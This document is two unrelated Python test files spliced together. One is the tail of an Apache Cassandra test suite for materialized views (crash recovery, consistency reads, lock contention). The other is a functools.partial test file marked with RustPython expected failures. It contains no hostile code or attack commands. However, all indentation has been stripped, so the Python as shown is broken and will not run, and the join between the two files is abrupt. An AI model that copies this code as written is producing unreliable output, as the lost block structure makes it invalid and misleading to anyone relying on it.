assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
"""
The internal addition of a view over a non existing table should be ignored
@jira_ticket CASSANDRA-13737
"""
cluster = self.cluster
cluster.populate(3)
cluster.start()
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
create_ks(session, 'ks', 3)
session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')
# create a materialized view only in nodes 1 and 2
node3.stop(wait_other_notice=True)
session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
'PRIMARY KEY (state, username)'))
# drop the base table only in node 3
node1.stop(wait_other_notice=True)
node2.stop(wait_other_notice=True)
node3.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
session.execute('DROP TABLE ks.users')
# restart the cluster
cluster.stop()
cluster.start()
# node3 should have received and ignored the creation of the MV over the dropped table
assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
"""
* Fails base table write before or after applying views
* Restart node and replay commit and batchlog
* Check that base and views are present
@jira_ticket CASSANDRA-13069
"""
self.cluster.set_batch_commitlog(enabled=True)
self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
self.prepare(rf=1, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Make node1 fail {} view writes'.format(fail_phase))
node1.byteman_submit(['./byteman/fail_{}_view_write.btm'.format(fail_phase)])
logger.debug('Write 1000 rows - all node1 writes should fail')
failed = False
for i in range(1, 1000):
try:
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
except WriteFailure:
failed = True
assert failed, "Should fail at least once."
assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"
missing_entries = 0
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
if not base_entry:
missing_entries += 1
if not view_entry:
missing_entries += 1
logger.debug("Missing entries {}".format(missing_entries))
assert missing_entries > 0
logger.debug('Restarting node1 to ensure commit log is replayed')
node1.stop(wait_other_notice=True)
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) // num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print(str(e))
queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
logger.debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in list(self.exception_type.keys()):
output = "{} ({}: {})".format(output, key, self.exception_type[key])
logger.debug(output)
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print(traceback.format_exception_only(type(e), e))
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async_ret = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async_ret.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
@pytest.mark.skip(reason='awaiting CASSANDRA-11290')
def test_single_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def test_multi_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(5)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
node1, node2, node3 = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) // processes
logger.debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
logger.debug("Writing data to base table")
for i in range(upper // 10):
self._do_row(insert1, i, num_partitions)
logger.debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug("Writing more data to base table")
for i in range(upper // 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
logger.debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
logger.debug("Finished writes, now verifying reads")
self._populate_rows()
threads = []
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = get_ip_from_node(node2)
t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
threads.append(t)
t.daemon = True
t.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
try:
mm = queues[i % processes].get(timeout=60)
except Empty as e:
pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
if not mm.out() is None:
logger.debug("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
for thread in threads:
thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
"""
Test materialized views lock contention.
@jira_ticket CASSANDRA-12689
@since 3.0
"""
def _prepare_cluster(self):
self.cluster.populate(1)
self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
self.protocol_version = 5 if self.supports_v5_protocol else 4
self.cluster.set_configuration_options(values={
'concurrent_materialized_view_writes': 1,
'concurrent_writes': 1,
})
self.nodes = list(self.cluster.nodes.values())
for node in self.nodes:
remove_perf_disable_shared_mem(node)
self.cluster.start(jvm_args=[
"-Dcassandra.test.fail_mv_locks_count=64"
])
session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
keyspace = "locktest"
session.execute("""
CREATE KEYSPACE IF NOT EXISTS {}
WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
""".format(keyspace))
session.set_keyspace(keyspace)
session.execute(
"CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
SELECT int1, date, int2
FROM test
WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
PRIMARY KEY (int1, date, int2)
WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")
return session
@since('3.0')
def test_mutations_dontblock(self):
session = self._prepare_cluster()
records = 100
records2 = 100
params = []
for x in range(records):
for y in range(records2):
params.append([x, y])
execute_concurrent_with_args(
session,
session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
params
)
assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])
for node in self.nodes:
with JolokiaAgent(node) as jmx:
mutationStagePending = jmx.read_attribute(
make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
)
assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, thread 'main' has overflowed its stack on Windows")
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle(self):
super().test_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_recursive_pickle(self):
super().test_recursive_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# TODO: RUSTPYTHON
def test_pickle(self):
TestPartial.test_pickle(self)
# TODO: RUSTPYTHON
def test_recursive_pickle(self):
TestPartial.test_recursive_pickle(self)
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertWarns(DeprecationWarning):
class B:
method = functools.partialmethod(func=capture, a=1)
b = B()
